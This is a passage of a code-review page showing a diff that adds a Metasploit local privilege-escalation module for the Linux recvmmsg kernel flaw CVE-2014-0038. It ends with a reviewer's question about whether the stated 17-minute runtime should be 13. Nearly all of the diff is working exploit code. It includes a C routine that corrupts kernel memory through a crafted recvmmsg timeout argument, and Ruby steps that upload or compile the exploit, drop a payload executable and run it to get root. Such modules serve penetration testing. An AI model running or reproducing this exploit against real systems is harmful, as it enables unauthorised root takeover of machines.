modules/exploits/linux/local/recvmmsg_priv_esc.rb

```diff
@@ -0,0 +1,354 @@
+          }
+
+          sa.sin_family = AF_INET;
+          sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+          sa.sin_port = htons(port);
+
+          if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+              perror("bind()");
+              exit(-1);
+          }
+
+          memset(msgs, 0, sizeof(msgs));
+
+          iovecs[0].iov_base = &buf;
+          iovecs[0].iov_len = BUFSIZE;
+          msgs[0].msg_hdr.msg_iov = &iovecs[0];
+          msgs[0].msg_hdr.msg_iovlen = 1;
+
+          for(i=0;i < 3 ;i++) {
+              udp(i);
+              retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
+              if(!retval) {
+                  fprintf(stderr,"\nrecvmmsg() failed\n");
+              }
+          }
+
+          close(sockfd);
+          fprintf(stderr,"\n");
+          trigger();
+      }
+    }
+
+    filename = rand_text_alphanumeric(8)
+    executable_path = "#{datastore['WritableDir']}/#{filename}"
+    payloadname = rand_text_alphanumeric(8)
+    payload_path = "#{datastore['WritableDir']}/#{payloadname}"
+
+    def has_prereqs?()
+      gcc = cmd_exec('which gcc')
+      if gcc.include?('gcc')
+        vprint_good('gcc is installed')
+      else
+        print_error('gcc is not installed.  Compiling will fail.')
+      end
+      return gcc.include?('gcc')
+    end
+
+    compile = false
+    if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
+      if has_prereqs?()
+        compile = true
+        vprint_status('Live compiling exploit on system')
+      else
+        vprint_status('Dropping pre-compiled exploit on system')
+      end
+    end
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    def upload_and_chmod(fname,fcontent)
+      print_status "Writing to #{fname} (#{fcontent.size} bytes)"
+      rm_f fname
+      write_file(fname, fcontent)
+      cmd_exec("chmod +x #{fname}")
+      register_file_for_cleanup(fname)
+    end
+
+    if compile
+      recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/,
+                          "system(\"#{payload_path}\");")
+      upload_and_chmod("#{executable_path}.c", recvmmsg)
+      vprint_status("Compiling #{executable_path}.c")
+      cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
+      register_file_for_cleanup(executable_path)
+    else
+      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')
+      fd = ::File.open( path, "rb")
+      recvmmsg = fd.read(fd.stat.size)
+      fd.close
+      upload_and_chmod(executable_path, recvmmsg)
+      # overwrite with the hardcoded variable names in the compiled versions
+      payload_filename = 'a0RwAacU'
+      payload_path = "/tmp/#{payload_filename}"
+    end
+
+    upload_and_chmod(payload_path, generate_payload_exe)
+    stime = Time.now
+    vprint_status("Exploiting... May take 17min.  Start time: #{stime}")
```

Comment:
This comment is a bit after-the-fact, but should this be 13 minutes? (per the module description and the C code, itself)  I'm happy to make the change if that's the case...